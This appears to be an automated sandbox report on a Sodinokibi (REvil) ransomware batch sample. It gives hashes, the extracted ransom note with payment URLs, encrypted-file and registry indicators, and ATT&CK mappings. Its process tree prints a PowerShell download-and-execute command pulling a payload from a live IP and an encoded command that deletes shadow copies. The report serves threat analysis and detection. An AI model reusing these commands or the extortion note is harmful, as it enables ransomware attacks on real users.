sodinokibi | 5edd7915fd9b57f2643fe8abf646344fccd2efc98d4dcbeab47659b14f59feb4

General

Target

16158bc1db4ba8fb8e9a13c34c8a51e1.bat
Size

216B
MD5

bf75953509fd375616976c6eb6f30aff
SHA1

3bf54cce4abd3c3434b7073e4ebe0f480295923c
SHA256

5edd7915fd9b57f2643fe8abf646344fccd2efc98d4dcbeab47659b14f59feb4
SHA512

8362b4f7c808e754bb468b31140b3ec023527e468ec8a9171111f77e39c55a8b04cc3442bc4c334a3cce25e90b9ce5cd14842d7cbd66fef8d6051d02f8e953f9

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/16158bc1db4ba8fb8e9a13c34c8a51e1

Extracted

Path

C:\4v057e0-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 4v057e0. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). We have copied financial files and other important information about personal data, it will be published on the Internet or will be used against you if you do not pay us, so if you do not want such consequences as customer churn, media coverage, fines like GDRP and other damages, we recommend you to contact us and pay the ransom. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/71D027CBC5483D95 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/71D027CBC5483D95 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: POX/a2yF2zomIaPN+UxRYa14bR/xN+ss7WSwlS0b3pVut5Ms1rzZ4XhFjRu5pbep Lf7b4kaGX7s14moz4SeNLMCV9DYm6sOhtzxOPT9RRDdhreDM5G70jIPQ2MTKZbS4 DlwPYIcZhxDs5K5FKxLEX4FORiWPEHQG+Hv/zntSZI1x+HYzx24QT6Li4YWlnmpS MtAZw1LaXy1f6HJZ36Z+SrpPbI4bcVI947RIGowk/er7FmBwFavhCRd+VtDdeaH7 6lsC/9iMiFoWgqIDD9tDrwS0DX1lAgFcgFmNHd9bvKh71M5OhFsjGNZUDah2fRcO PtC7ZjSKo5mwnY6qxNA/7xZRGRZrw7Fz+6sNgnvxwrEWQJTZtVrBj9RGKfqiBK3r dMwZ2WCPTlNWugBIJN5FhnRpSGbmisivnuzaxPcwrt7LlOf4b1MJjv0RdLnhMFDp mgGd8TXUQPd+LGUbxXTFukYrM1bFcdrnaRGlJxnC3cBoLFWWY2VuuCWvhLc0mj/o rP/WctgAnDdqBC2kmOagmamdPso8FMfXPmCYV1dWXw6VV0bAxTenqx8YihJYP+XQ 5aQdFogykqyJCBWcCr9l99iVtbb9vlbGSZybAw1zTciqnA6WLYAVdXr9VXC4FX12 fFA6fIx3P07xslbW1gSkViqRK/MHN1Kb0T+YKzN8E42Aqmoc0OBKzcwr4HOBsw33 cMSZtRNLIFQhse2lm9JRX0y5hlcfu6HzI1Nv6wOCz1kWhotC4w2chiB0thOdfPsp wGn0EJb4fvMG3ZUxGZEODWiWi5iQRRLlk6HtUOS73/ylmurgRsK+8dn5WWAbCTot PWS3000lgLRpJgN16F6G38l36nsE0R4dKs6jjfmng+Os0LMPRXOa+OSrVKU+B9BQ 8BzykKgKzRIrZR8FlYcXR/IMjxg9mlr0sPExbxZTT+BBvAK9r5PJzc7gwj0VreZS Whw8HftTx3vdxC0ukNByJ6GsaBux7WUYKgJ3KjyZ12FLkR4BUxVI0Lm6VT4p+0jL ETYpcQopoyeMu2uZkMwBCNPhTSry6wlcpTZW4h1/SrQLjOdlN02fjA6hPZk/MRNK XKDh7R2S2BDZcQ12lse4VYVs+bQMvJQyPFa+NsQD0D43D6KkdhQl8FbvmEA8CaU4 eprgslvupbyjDlaZCEn9kqZGN0pgK/g0C3kirtSq2BO5A4qYcD7K5mOHze/uHoWu Q4gxhaudRoWweAKXW9NZQGG0Ys0t4i2wDj84HavEcmThhhciDh0pPMb9VhsbYfmh unsY8OhJ0zkpjQ6TiddKs8CK ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/71D027CBC5483D95

http://decryptor.cc/71D027CBC5483D95

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

1 3880 powershell.exe

flow	pid	process
1	3880	powershell.exe

Modifies extensions of user files 9 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\users\admin\pictures\ConvertFromClose.tiff	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\MergeRedo.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromClose.tiff => \??\c:\users\admin\pictures\ConvertFromClose.tiff.4v057e0	powershell.exe
File renamed	C:\Users\Admin\Pictures\RegisterConvertFrom.png => \??\c:\users\admin\pictures\RegisterConvertFrom.png.4v057e0	powershell.exe
File renamed	C:\Users\Admin\Pictures\StartEnter.png => \??\c:\users\admin\pictures\StartEnter.png.4v057e0	powershell.exe
File renamed	C:\Users\Admin\Pictures\MergeRedo.tiff => \??\c:\users\admin\pictures\MergeRedo.tiff.4v057e0	powershell.exe
File renamed	C:\Users\Admin\Pictures\BackupUnregister.crw => \??\c:\users\admin\pictures\BackupUnregister.crw.4v057e0	powershell.exe
File renamed	C:\Users\Admin\Pictures\SaveSubmit.png => \??\c:\users\admin\pictures\SaveSubmit.png.4v057e0	powershell.exe
File renamed	C:\Users\Admin\Pictures\SearchPop.crw => \??\c:\users\admin\pictures\SearchPop.crw.4v057e0	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2168186643-810464528-1121082739-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\535qwwk.bmp"	powershell.exe

Drops file in Program Files directory 34 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\ConvertToUse.ini	powershell.exe
File opened for modification	\??\c:\program files\SaveSwitch.mht	powershell.exe
File opened for modification	\??\c:\program files\UnblockPop.jpe	powershell.exe
File opened for modification	\??\c:\program files\UseEnable.7z	powershell.exe
File opened for modification	\??\c:\program files\SubmitEdit.pptx	powershell.exe
File created	\??\c:\program files\4v057e0-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\GrantPush.fon	powershell.exe
File opened for modification	\??\c:\program files\MergeInitialize.xml	powershell.exe
File opened for modification	\??\c:\program files\ProtectPublish.rm	powershell.exe
File opened for modification	\??\c:\program files\GroupOptimize.dwg	powershell.exe
File opened for modification	\??\c:\program files\NewRemove.mp2v	powershell.exe
File opened for modification	\??\c:\program files\RestartGrant.m4a	powershell.exe
File opened for modification	\??\c:\program files\RestartPing.mht	powershell.exe
File opened for modification	\??\c:\program files\ImportAdd.i64	powershell.exe
File opened for modification	\??\c:\program files\LockOpen.pps	powershell.exe
File opened for modification	\??\c:\program files\WaitGrant.wm	powershell.exe
File opened for modification	\??\c:\program files\RestartSearch.mht	powershell.exe
File created	\??\c:\program files (x86)\4v057e0-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ClearRedo.mpeg3	powershell.exe
File opened for modification	\??\c:\program files\MeasureRead.mpeg	powershell.exe
File opened for modification	\??\c:\program files\PopRedo.midi	powershell.exe
File opened for modification	\??\c:\program files\SyncMeasure.ex_	powershell.exe
File opened for modification	\??\c:\program files\TraceClear.reg	powershell.exe
File opened for modification	\??\c:\program files\TraceEnter.bmp	powershell.exe
File opened for modification	\??\c:\program files\UndoExpand.ppt	powershell.exe
File opened for modification	\??\c:\program files\AddSend.wvx	powershell.exe
File opened for modification	\??\c:\program files\ExitSplit.vsdx	powershell.exe
File opened for modification	\??\c:\program files\FindConvertTo.ADTS	powershell.exe
File opened for modification	\??\c:\program files\ResetUse.mpeg	powershell.exe
File opened for modification	\??\c:\program files\BackupUnlock.xml	powershell.exe
File opened for modification	\??\c:\program files\LimitShow.ods	powershell.exe
File opened for modification	\??\c:\program files\OptimizeRead.vst	powershell.exe
File opened for modification	\??\c:\program files\SubmitOptimize.tif	powershell.exe
File opened for modification	\??\c:\program files\EditMount.xsl	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe

pid	process
3880	powershell.exe
3880	powershell.exe
3880	powershell.exe
3880	powershell.exe
3880	powershell.exe
3968	powershell.exe
3968	powershell.exe
3968	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	3880	powershell.exe
Token: SeDebugPrivilege	3880	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeBackupPrivilege	352	vssvc.exe
Token: SeRestorePrivilege	352	vssvc.exe
Token: SeAuditPrivilege	352	vssvc.exe
Token: SeTakeOwnershipPrivilege	3880	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 964 wrote to memory of 3880	964	cmd.exe	powershell.exe
PID 964 wrote to memory of 3880	964	cmd.exe	powershell.exe
PID 964 wrote to memory of 3880	964	cmd.exe	powershell.exe
PID 3880 wrote to memory of 3968	3880	powershell.exe	powershell.exe
PID 3880 wrote to memory of 3968	3880	powershell.exe	powershell.exe
PID 3880 wrote to memory of 3968	3880	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\16158bc1db4ba8fb8e9a13c34c8a51e1.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/16158bc1db4ba8fb8e9a13c34c8a51e1');Invoke-ZOPUSYDNI;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3968

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:352

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3880-0-0x0000000000000000-mapping.dmp

Download
memory/3880-1-0x0000000073320000-0x0000000073A0E000-memory.dmp

Filesize
6.9MB

Download
memory/3880-2-0x0000000004530000-0x0000000004531000-memory.dmp

Filesize
4KB

Download
memory/3880-3-0x0000000007240000-0x0000000007241000-memory.dmp

Filesize
4KB

Download
memory/3880-4-0x0000000006EC0000-0x0000000006EC1000-memory.dmp

Filesize
4KB

Download
memory/3880-5-0x0000000007060000-0x0000000007061000-memory.dmp

Filesize
4KB

Download
memory/3880-6-0x00000000070D0000-0x00000000070D1000-memory.dmp

Filesize
4KB

Download
memory/3880-7-0x0000000007980000-0x0000000007981000-memory.dmp

Filesize
4KB

Download
memory/3880-8-0x00000000071A0000-0x00000000071A1000-memory.dmp

Filesize
4KB

Download
memory/3880-9-0x0000000007D70000-0x0000000007D71000-memory.dmp

Filesize
4KB

Download
memory/3880-10-0x0000000008100000-0x0000000008101000-memory.dmp

Filesize
4KB

Download
memory/3880-11-0x00000000097D0000-0x00000000097D1000-memory.dmp

Filesize
4KB

Download
memory/3880-12-0x0000000008D50000-0x0000000008D51000-memory.dmp

Filesize
4KB

Download
memory/3968-13-0x0000000000000000-mapping.dmp

Download
memory/3968-14-0x0000000073320000-0x0000000073A0E000-memory.dmp

Filesize
6.9MB

Download
memory/3968-24-0x0000000008CF0000-0x0000000008CF1000-memory.dmp

Filesize
4KB

Download
memory/3968-26-0x0000000007F00000-0x0000000007F01000-memory.dmp

Filesize
4KB

Download
memory/3968-27-0x0000000009290000-0x0000000009291000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads